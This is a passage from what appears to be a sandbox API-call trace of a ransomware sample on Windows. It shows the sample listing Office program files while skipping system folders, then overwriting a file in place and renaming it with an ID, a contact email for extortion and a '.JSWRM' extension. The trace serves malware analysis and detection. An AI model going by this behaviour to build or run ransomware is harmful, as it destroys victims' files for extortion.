ftLastAccessTime.dwLowDateTime=0xeddd0ee4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c6e13e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e13, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="muauth.cab", cAlternateFileName="")) returned 1 [0137.498] lstrcmpiW (lpString1="muauth.cab", lpString2=".") returned 1 [0137.498] lstrcmpiW (lpString1="muauth.cab", lpString2="..") returned 1 [0137.498] lstrcmpiW (lpString1="muauth.cab", lpString2="...") returned 1 [0137.498] lstrcmpiW (lpString1="muauth.cab", lpString2="windows") returned -1 [0137.498] lstrcmpiW (lpString1="muauth.cab", lpString2="recovery") returned -1 [0137.498] lstrcmpiW (lpString1="muauth.cab", lpString2="perflogs") returned -1 [0137.498] lstrcmpiW (lpString1="muauth.cab", lpString2="documents and settings") returned 1 [0137.498] lstrcmpiW (lpString1="muauth.cab", lpString2="$RECYCLE.BIN") returned 1 [0137.498] lstrcmpiW (lpString1="muauth.cab", lpString2="system volume information") returned -1 [0137.498] lstrcmpiW (lpString1="muauth.cab", lpString2="msocache") returned 1 [0137.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0137.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="muauth.cab", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0137.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="muauth.cab", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="muauth.cab", lpUsedDefaultChar=0x0) returned 10 [0137.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0137.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0137.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="muauth.cab", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0137.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="muauth.cab", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="muauth.cab", lpUsedDefaultChar=0x0) returned 10 [0137.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0137.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0137.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224cc8 | out: hHeap=0x1e0000) returned 1 [0137.498] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddd0ee4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddd0ee4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfae22cc9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1536, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MYSL.ICO", cAlternateFileName="")) returned 1 [0137.498] lstrcmpiW (lpString1="MYSL.ICO", lpString2=".") returned 1 [0137.499] lstrcmpiW (lpString1="MYSL.ICO", lpString2="..") returned 1 [0137.499] lstrcmpiW (lpString1="MYSL.ICO", lpString2="...") returned 1 [0137.499] lstrcmpiW (lpString1="MYSL.ICO", lpString2="windows") returned -1 [0137.499] lstrcmpiW (lpString1="MYSL.ICO", lpString2="recovery") returned -1 [0137.499] lstrcmpiW (lpString1="MYSL.ICO", lpString2="perflogs") returned -1 [0137.499] lstrcmpiW (lpString1="MYSL.ICO", lpString2="documents and settings") returned 1 [0137.499] lstrcmpiW (lpString1="MYSL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0137.499] lstrcmpiW (lpString1="MYSL.ICO", lpString2="system volume information") returned -1 [0137.499] lstrcmpiW (lpString1="MYSL.ICO", lpString2="msocache") returned 1 [0137.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0137.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MYSL.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0137.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MYSL.ICO", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MYSL.ICO", lpUsedDefaultChar=0x0) returned 8 [0137.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0137.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0137.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MYSL.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0137.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MYSL.ICO", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MYSL.ICO", lpUsedDefaultChar=0x0) returned 8 [0137.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0137.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0137.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0137.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0137.499] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MYSL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mysl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.500] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=5430) returned 1 [0137.500] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1530) returned 0x27b348 [0137.500] ReadFile (in: hFile=0x45c, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1530, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345ec04*=0x1530, lpOverlapped=0x0) returned 1 [0137.510] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.511] WriteFile (in: hFile=0x45c, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1530, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345ec00*=0x1530, lpOverlapped=0x0) returned 1 [0137.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0137.512] CloseHandle (hObject=0x45c) returned 1 [0137.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0137.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0137.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0137.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0137.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0137.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0137.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0137.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0137.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0137.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0137.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0137.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24bce0 [0137.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0137.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f158 [0137.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0137.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0137.512] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MYSL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mysl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MYSL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mysl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0137.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0137.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0137.514] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddd0ee4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddd0ee4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9a04f26, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1ae48, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="NAME.DLL", cAlternateFileName="")) returned 1 [0137.514] lstrcmpiW (lpString1="NAME.DLL", lpString2=".") returned 1 [0137.514] lstrcmpiW (lpString1="NAME.DLL", lpString2="..") returned 1 [0137.514] lstrcmpiW (lpString1="NAME.DLL", lpString2="...") returned 1 [0137.514] lstrcmpiW (lpString1="NAME.DLL", lpString2="windows") returned -1 [0137.514] lstrcmpiW (lpString1="NAME.DLL", lpString2="recovery") returned -1 [0137.514] lstrcmpiW (lpString1="NAME.DLL", lpString2="perflogs") returned -1 [0137.514] lstrcmpiW (lpString1="NAME.DLL", lpString2="documents and settings") returned 1 [0137.514] lstrcmpiW (lpString1="NAME.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.514] lstrcmpiW (lpString1="NAME.DLL", lpString2="system volume information") returned -1 [0137.514] lstrcmpiW (lpString1="NAME.DLL", lpString2="msocache") returned 1 [0137.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0137.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAME.DLL", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0137.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAME.DLL", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NAME.DLL", lpUsedDefaultChar=0x0) returned 8 [0137.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0137.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0137.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAME.DLL", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0137.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAME.DLL", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NAME.DLL", lpUsedDefaultChar=0x0) returned 8 [0137.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0137.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0137.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0137.515] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddd0ee4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddd0ee4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf035e09d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5868, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="NAMECONTROLPROXY.DLL", cAlternateFileName="NAMECO~1.DLL")) returned 1 [0137.515] lstrcmpiW (lpString1="NAMECONTROLPROXY.DLL", lpString2=".") returned 1 [0137.515] lstrcmpiW (lpString1="NAMECONTROLPROXY.DLL", lpString2="..") returned 1 [0137.515] lstrcmpiW (lpString1="NAMECONTROLPROXY.DLL", lpString2="...") returned 1 [0137.515] lstrcmpiW (lpString1="NAMECONTROLPROXY.DLL", lpString2="windows") returned -1 [0137.515] lstrcmpiW (lpString1="NAMECONTROLPROXY.DLL", lpString2="recovery") returned -1 [0137.515] lstrcmpiW (lpString1="NAMECONTROLPROXY.DLL", lpString2="perflogs") returned -1 [0137.515] lstrcmpiW (lpString1="NAMECONTROLPROXY.DLL", lpString2="documents and settings") returned 1 [0137.515] lstrcmpiW (lpString1="NAMECONTROLPROXY.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.515] lstrcmpiW (lpString1="NAMECONTROLPROXY.DLL", lpString2="system volume information") returned -1 [0137.515] lstrcmpiW (lpString1="NAMECONTROLPROXY.DLL", lpString2="msocache") returned 1 [0137.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0137.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAMECONTROLPROXY.DLL", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0137.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0137.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAMECONTROLPROXY.DLL", cchWideChar=20, lpMultiByteStr=0x240fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NAMECONTROLPROXY.DLL", lpUsedDefaultChar=0x0) returned 20 [0137.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0137.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0137.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAMECONTROLPROXY.DLL", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0137.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0137.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAMECONTROLPROXY.DLL", cchWideChar=20, lpMultiByteStr=0x2410d8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NAMECONTROLPROXY.DLL", lpUsedDefaultChar=0x0) returned 20 [0137.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0137.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0137.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0137.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0137.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0137.515] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe2366bd3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe2366bd3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe2471bd1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1f268, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="NAMECONTROLSERVER.EXE", cAlternateFileName="NAMECO~1.EXE")) returned 1 [0137.515] lstrcmpiW (lpString1="NAMECONTROLSERVER.EXE", lpString2=".") returned 1 [0137.516] lstrcmpiW (lpString1="NAMECONTROLSERVER.EXE", lpString2="..") returned 1 [0137.516] lstrcmpiW (lpString1="NAMECONTROLSERVER.EXE", lpString2="...") returned 1 [0137.516] lstrcmpiW (lpString1="NAMECONTROLSERVER.EXE", lpString2="windows") returned -1 [0137.516] lstrcmpiW (lpString1="NAMECONTROLSERVER.EXE", lpString2="recovery") returned -1 [0137.516] lstrcmpiW (lpString1="NAMECONTROLSERVER.EXE", lpString2="perflogs") returned -1 [0137.516] lstrcmpiW (lpString1="NAMECONTROLSERVER.EXE", lpString2="documents and settings") returned 1 [0137.516] lstrcmpiW (lpString1="NAMECONTROLSERVER.EXE", lpString2="$RECYCLE.BIN") returned 1 [0137.516] lstrcmpiW (lpString1="NAMECONTROLSERVER.EXE", lpString2="system volume information") returned -1 [0137.516] lstrcmpiW (lpString1="NAMECONTROLSERVER.EXE", lpString2="msocache") returned 1 [0137.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0137.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAMECONTROLSERVER.EXE", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0137.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0137.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAMECONTROLSERVER.EXE", cchWideChar=21, lpMultiByteStr=0x240fc0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NAMECONTROLSERVER.EXE", lpUsedDefaultChar=0x0) returned 21 [0137.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0137.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0137.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAMECONTROLSERVER.EXE", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0137.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0137.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAMECONTROLSERVER.EXE", cchWideChar=21, lpMultiByteStr=0x241178, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NAMECONTROLSERVER.EXE", lpUsedDefaultChar=0x0) returned 21 [0137.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0137.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0137.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0137.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0137.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0137.516] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b7e331c, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b7e331c, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b809370, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x4c0c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="NAMEEXT.DLL", cAlternateFileName="")) returned 1 [0137.516] lstrcmpiW (lpString1="NAMEEXT.DLL", lpString2=".") returned 1 [0137.516] lstrcmpiW (lpString1="NAMEEXT.DLL", lpString2="..") returned 1 [0137.516] lstrcmpiW (lpString1="NAMEEXT.DLL", lpString2="...") returned 1 [0137.516] lstrcmpiW (lpString1="NAMEEXT.DLL", lpString2="windows") returned -1 [0137.516] lstrcmpiW (lpString1="NAMEEXT.DLL", lpString2="recovery") returned -1 [0137.516] lstrcmpiW (lpString1="NAMEEXT.DLL", lpString2="perflogs") returned -1 [0137.516] lstrcmpiW (lpString1="NAMEEXT.DLL", lpString2="documents and settings") returned 1 [0137.516] lstrcmpiW (lpString1="NAMEEXT.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.516] lstrcmpiW (lpString1="NAMEEXT.DLL", lpString2="system volume information") returned -1 [0137.516] lstrcmpiW (lpString1="NAMEEXT.DLL", lpString2="msocache") returned 1 [0137.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0137.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAMEEXT.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAMEEXT.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NAMEEXT.DLL", lpUsedDefaultChar=0x0) returned 11 [0137.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0137.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0137.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAMEEXT.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NAMEEXT.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NAMEEXT.DLL", lpUsedDefaultChar=0x0) returned 11 [0137.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0137.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0137.517] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0137.517] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddd0ee4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddd0ee4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c6e13e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4630f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="NativeHostAnnotationApp.xap", cAlternateFileName="NATIVE~1.XAP")) returned 1 [0137.517] lstrcmpiW (lpString1="NativeHostAnnotationApp.xap", lpString2=".") returned 1 [0137.517] lstrcmpiW (lpString1="NativeHostAnnotationApp.xap", lpString2="..") returned 1 [0137.517] lstrcmpiW (lpString1="NativeHostAnnotationApp.xap", lpString2="...") returned 1 [0137.517] lstrcmpiW (lpString1="NativeHostAnnotationApp.xap", lpString2="windows") returned -1 [0137.517] lstrcmpiW (lpString1="NativeHostAnnotationApp.xap", lpString2="recovery") returned -1 [0137.517] lstrcmpiW (lpString1="NativeHostAnnotationApp.xap", lpString2="perflogs") returned -1 [0137.517] lstrcmpiW (lpString1="NativeHostAnnotationApp.xap", lpString2="documents and settings") returned 1 [0137.517] lstrcmpiW (lpString1="NativeHostAnnotationApp.xap", lpString2="$RECYCLE.BIN") returned 1 [0137.517] lstrcmpiW (lpString1="NativeHostAnnotationApp.xap", lpString2="system volume information") returned -1 [0137.517] lstrcmpiW 